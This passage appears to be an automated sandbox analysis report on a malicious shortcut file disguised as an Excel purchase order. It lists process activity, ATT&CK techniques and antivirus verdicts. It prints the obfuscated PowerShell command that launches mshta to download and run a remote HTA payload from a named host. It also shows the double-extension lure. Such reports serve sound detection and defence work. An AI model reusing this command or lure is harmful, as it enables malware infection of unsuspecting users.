Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: #U56de#U590d BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnkLNK file: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: calc.pdbGCTL source: mshta.exe, 00000004.00000002.3450455572.000001C167E72000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3450455572.000001C167E6D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3448055036.000001B9652C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3450455572.000001C167E32000.00000004.00000020.00020000.00000000.sdmp, drip[1].hta.4.dr
Source: Binary string: calc.pdb source: mshta.exe, 00000004.00000002.3450455572.000001C167E72000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3450455572.000001C167E6D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3450455572.000001C167E32000.00000004.00000020.00020000.00000000.sdmp, drip[1].hta.4.dr

Data Obfuscation

barindex
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/drip.hta

Persistence and Installation Behavior

barindex
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: Possible double extension: xlsx.lnkStatic PE information: #U56de#U590d BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnk
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2876Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3108Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3404Thread sleep time: -3689348814741908s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1656Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3492Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: mshta.exe, 00000004.00000002.3448055036.000001B965274000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWj$
Source: mshta.exe, 00000004.00000002.3448055036.000001B965226000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3448055036.000001B9652C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3450615757.0000019951454000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3448811711.000001994BC2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3448845434.000001994BC3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\mshta.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://www.sessosesso.it/assets/aw/drip.htaJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
PowerShell
1
DLL Side-Loading
11
Process Injection
111
Masquerading
OS Credential Dumping11
Security Software Discovery
Remote Services1
Email Collection
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Disable or Modify Tools
LSASS Memory11
Process Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
Virtualization/Sandbox Evasion
Security Account Manager31
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA Secrets1
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain Credentials22
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
#U56de#U590d BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnk18%ReversingLabsShortcut.Trojan.Generic
#U56de#U590d BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnk20%VirustotalBrowse
#U56de#U590d BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnk100%AviraLNK/Dldr.Agent.VPYB
#U56de#U590d BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnk100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
www.sessosesso.it0%VirustotalBrowse
SourceDetectionScannerLabelLink
https://www.sessosesso.it/assets/aw/drip.hta(e0%Avira URL Cloudsafe
https://www.sessosesso.it/assets/aw/drip.htahttps://www.sessosesso.it/assets/aw/drip.hta0%Avira URL Cloudsafe
https://www.sessosesso.it/assets/aw/drip.htapmwi0%Avira URL Cloudsafe
https://www.sessosesso.it/assets/aw/drip.htadowsINetCache0%Avira URL Cloudsafe
https://www.sessosesso.it/assets/aw/drip.htahis0%Avira URL Cloudsafe
https://www.sessosesso.it/assets/aw/drip.hta0%Avira URL Cloudsafe
https://www.sessosesso.it/assets/aw/drip.htaq0%Avira URL Cloudsafe
https://www.sessosesso.it/assets/aw/drip.htahis2%VirustotalBrowse
https://www.sessosesso.it/assets/aw/drip.hta70%Avira URL Cloudsafe
http://crl.ver)0%Avira URL Cloudsafe
https://www.sessosesso.it/assets/aw/drip.htahttps://www.sessosesso.it/assets/aw/drip.hta2%VirustotalBrowse
https://www.sessosesso.it/assets/aw/drip.htaAC:0%Avira URL Cloudsafe
https://www.sessosesso.it/assets/aw/drip.hta3%VirustotalBrowse
https://www.sessosesso.it/assets/aw/drip.htaC:0%Avira URL Cloudsafe
https://www.sessosesso.it/assets/aw/drip.htapage.0%Avira URL Cloudsafe
https://www.sessosesso.it/assets/aw/drip.hta...BA0%Avira URL Cloudsafe
https://www.sessosesso.it/assets/aw/drip.htaAC:2%VirustotalBrowse
https://www.sessosesso.it/assets/aw/drip.hta=0%Avira URL Cloudsafe
https://www.sessosesso.it/assets/aw/drip.htaROWSEo0%Avira URL Cloudsafe
https://www.sessosesso.it/assets/aw/drip.hta4C0%Avira URL Cloudsafe
https://www.sessosesso.it/assets/aw/drip.htaH0%Avira URL Cloudsafe
https://www.sessosesso.it/assets/aw/drip.htaC:2%VirustotalBrowse
https://www.sessosesso.it/assets/aw/drip.htaK0%Avira URL Cloudsafe
https://www.sessosesso.it/0%Avira URL Cloudsafe
https://www.sessosesso.it/assets/aw/drip.hta...0%Avira URL Cloudsafe
https://www.sessosesso.it/)0%Avira URL Cloudsafe
https://www.sessosesso.it/0%VirustotalBrowse
https://www.sessosesso.it/assets/aw/drip.htaX0%Avira URL Cloudsafe
https://www.sessosesso.it/assets/aw/drip.hta0?i0%Avira URL Cloudsafe
https://www.sessosesso.it/assets/aw/drip.hta...2%VirustotalBrowse
https://www.sessosesso.it/assets/aw/drip.htadows0%Avira URL Cloudsafe
https://www.sessosesso.it/assets/aw/drip.htaHu0%Avira URL Cloudsafe
https://www.sessosesso.it/assets/aw/drip.htaa0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
www.sessosesso.it
89.46.106.29
truetrueunknown
NameMaliciousAntivirus DetectionReputation
https://www.sessosesso.it/assets/aw/drip.htatrue
  • 3%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
NameSourceMaliciousAntivirus DetectionReputation
https://www.sessosesso.it/assets/aw/drip.htadowsINetCachemshta.exe, 00000004.00000002.3448055036.000001B965274000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://www.sessosesso.it/assets/aw/drip.htahismshta.exe, 00000004.00000002.3449395275.000001C16721C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3450455572.000001C167DF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3451579890.000001C16978F000.00000004.00000020.00020000.00000000.sdmpfalse
  • 2%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://www.sessosesso.it/assets/aw/drip.htahttps://www.sessosesso.it/assets/aw/drip.htamshta.exe, 00000004.00000002.3451288746.000001C169695000.00000004.00000800.00020000.00000000.sdmpfalse
  • 2%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://www.sessosesso.it/assets/aw/drip.hta(emshta.exe, 00000004.00000002.3448055036.000001B965274000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://www.sessosesso.it/assets/aw/drip.htapmwimshta.exe, 00000004.00000002.3450455572.000001C167DD0000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://www.sessosesso.it/assets/aw/drip.htaqmshta.exe, 00000004.00000002.3448055036.000001B965226000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://www.sessosesso.it/assets/aw/drip.hta7mshta.exe, 00000004.00000002.3448055036.000001B965226000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000006.00000003.2243523519.00000199511D0000.00000004.00000800.00020000.00000000.sdmp, edb.log.6.drfalse
    high
    http://crl.ver)svchost.exe, 00000006.00000002.3450474080.0000019951400000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    low
    https://www.sessosesso.it/assets/aw/drip.htaAC:#U56de#U590d BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnktrue
    • 2%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://www.sessosesso.it/assets/aw/drip.htaC:mshta.exe, 00000004.00000002.3450455572.000001C167DF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3448055036.000001B965200000.00000004.00000020.00020000.00000000.sdmpfalse
    • 2%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://www.sessosesso.it/assets/aw/drip.htapage.mshta.exe, 00000004.00000002.3450455572.000001C167DD0000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://www.sessosesso.it/assets/aw/drip.hta...BAmshta.exe, 00000004.00000002.3450455572.000001C167DF0000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://www.sessosesso.it/assets/aw/drip.hta=mshta.exe, 00000004.00000002.3448055036.000001B965207000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://www.sessosesso.it/assets/aw/drip.hta4Cmshta.exe, 00000004.00000002.3450455572.000001C167DF0000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://www.sessosesso.it/assets/aw/drip.htaROWSEomshta.exe, 00000004.00000002.3448813809.000001B9654A0000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
